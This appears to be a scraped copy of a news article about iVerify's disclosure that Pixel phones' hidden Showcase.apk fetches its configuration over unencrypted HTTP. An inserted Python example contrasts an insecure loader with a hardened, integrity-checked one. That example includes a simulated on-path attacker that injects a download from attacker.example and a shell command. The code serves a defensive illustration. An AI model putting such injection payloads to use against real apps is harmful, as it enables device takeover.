
Yiamastaverna


Almost all Google Pixel phones are at risk due to an unpatched bug in the hidden Android app

Google’s flagship Pixel smartphone line touts security as a core feature, offers guaranteed software updates for seven years, and runs stock Android that’s supposed to be free of third-party add-ons and bloatware. But on Thursday, researchers at mobile security firm iVerify published findings on an Android vulnerability that appears to have been present in every Android version for Pixel since September 2017 and could leave the devices vulnerable to tampering and takeover.

The issue affects a software package called “Showcase.apk” that runs at the system level and is invisible to users. The application was developed by enterprise software company Smith Micro for Verizon to put phones into a retail store demo mode; it is not Google software. Yet it has shipped in every Android release for Pixels for years and runs with extensive system privileges, including the ability to execute code and install software on instruction from a remote server. Worse, the application fetches its configuration file over an unencrypted HTTP connection. An attacker positioned on the network path could intercept and replace that file, iVerify's researchers say, taking control of the application and, through its privileges, the entire device.
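The failure mode described above, as an added example that is not Showcase.apk's, Smith Micro's or iVerify's code: a privileged app that applies whatever configuration arrives over plain HTTP hands control to anyone on the network path, and the fix has two layers, refuse non-TLS URLs and verify the payload's integrity before acting on it. The URL, the config fields, the envelope format and the key below are all constructed for illustration; the integrity tag is an HMAC only so that the example runs on the standard library, whereas a shipped fix would verify an asymmetric signature against a pinned public key so that no secret has to live in the firmware.

```python
"""Plain-HTTP config fetch (the pattern described in the article) beside a
hardened loader. Added example; every name and value here is made up."""
import hashlib
import hmac
import json
from urllib.parse import urlparse

# Constructed: the configuration the legitimate server publishes.
SERVER_CONFIG = {"mode": "demo", "install": [], "exec": []}

# Constructed integrity key (see lead-in: a real fix would use a pinned
# public key and an asymmetric signature, not a shared secret).
CONFIG_KEY = b"illustrative-provisioning-key"


def canonical(cfg):
    """Deterministic serialisation so signer and verifier hash identical bytes."""
    return json.dumps(cfg, sort_keys=True, separators=(",", ":")).encode()


def server_publish(cfg=SERVER_CONFIG):
    """What the server serves: the payload plus a tag over its canonical form."""
    payload = canonical(cfg)
    tag = hmac.new(CONFIG_KEY, payload, hashlib.sha256).hexdigest()
    return json.dumps({"payload": payload.decode(), "tag": tag}).encode()


def on_path_attacker(envelope):
    """An attacker who can rewrite unencrypted traffic points the app at their
    own APK and command. Without the key they cannot recompute the tag, so it
    is left untouched; the insecure loader never looks at it anyway."""
    env = json.loads(envelope)
    cfg = json.loads(env["payload"])
    cfg["install"] = ["http://attacker.example/payload.apk"]
    cfg["exec"] = ["sh -c 'id > /data/local/tmp/pwned'"]
    env["payload"] = canonical(cfg).decode()
    return json.dumps(env).encode()


def fetch(url, attacker=None):
    """Stand-in for the network. Over plain http:// an on-path attacker can
    rewrite the body; over https:// the body arrives as published."""
    body = server_publish()
    if urlparse(url).scheme == "http" and attacker is not None:
        body = attacker(body)  # no TLS: the attacker substitutes the response
    return body


def load_config_insecure(url, attacker=None):
    """The pattern the article describes: fetch over HTTP, apply what arrives."""
    env = json.loads(fetch(url, attacker))
    return json.loads(env["payload"])  # the tag is present but never checked


def verify_envelope(envelope):
    """Layer 2: reject any payload whose tag does not verify (constant-time)."""
    env = json.loads(envelope)
    payload = env["payload"].encode()
    expected = hmac.new(CONFIG_KEY, payload, hashlib.sha256).hexdigest()
    if not hmac.compare_digest(expected, env["tag"]):
        raise ValueError("config integrity check failed")
    return json.loads(payload)


def load_config_hardened(url, attacker=None):
    """Layer 1: refuse anything but https. Layer 2: verify before acting."""
    scheme = urlparse(url).scheme
    if scheme != "https":
        raise ValueError("refusing to fetch config over %r" % scheme)
    return verify_envelope(fetch(url, attacker))


def raises_value_error(fn, *args):
    """Small helper so callers can check rejection paths without try/except."""
    try:
        fn(*args)
    except ValueError:
        return True
    return False


if __name__ == "__main__":
    bad = load_config_insecure("http://config.example/showcase.json", on_path_attacker)
    print("insecure loader would install", bad["install"], "and run", bad["exec"])
    good = load_config_hardened("https://config.example/showcase.json", on_path_attacker)
    print("hardened loader applied", good)
```

The point of the two layers is that neither alone is enough: TLS stops the on-path rewrite, and the integrity check stops a tampered or stale file served from a compromised or impersonated origin, so the app never acts on an `install` or `exec` list it cannot tie back to its publisher.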

iVerify shared its findings with Google in early May, and the tech giant has yet to release a fix for the issue. Google spokesman Ed Fernandez tells WIRED in a statement that Showcase is “no longer used” by Verizon and that Android will remove Showcase from all supported Pixel devices with a software update “in the coming weeks.” He added that Google has seen no evidence of active exploitation and that the app is absent from the new Pixel 9 series devices that Google announced this week. Verizon and Smith Micro did not respond to WIRED’s requests for comment before publication.

“I’ve seen a lot of Android vulnerabilities, and this one is unique in some ways and quite disturbing,” says Rocky Cole, chief operating officer of iVerify and a former U.S. National Security Agency analyst. “When Showcase.apk is run, it can take over the phone. But the code is, frankly, sloppy. It raises questions as to why third-party software running with such high privileges so deep in the operating system hasn’t been tested more thoroughly. It seems to me that Google has pushed bloatware onto Pixel devices around the world.”

iVerify researchers discovered the application after the company’s threat detection scanner detected an unusual validation of an app in the Google Play Store on a user’s device. The client, big data analytics firm Palantir, worked with iVerify to investigate Showcase.apk and report the findings to Google. Dane Stuckey, chief information security officer at Palantir, says the discovery and what he believes was a slow and opaque response from Google prompted Palantir to pull not just Pixel phones but all Android devices across the company.

“Google’s embedding of third-party software in Android’s firmware and not disclosing it to vendors or users creates significant security risks for everyone who relies on that ecosystem,” Stuckey told WIRED. He added that his interactions with Google during the usual 90-day disclosure period “seriously undermined our trust in the ecosystem. To protect our customers, we had to make the difficult decision to move away from Android in our company.”
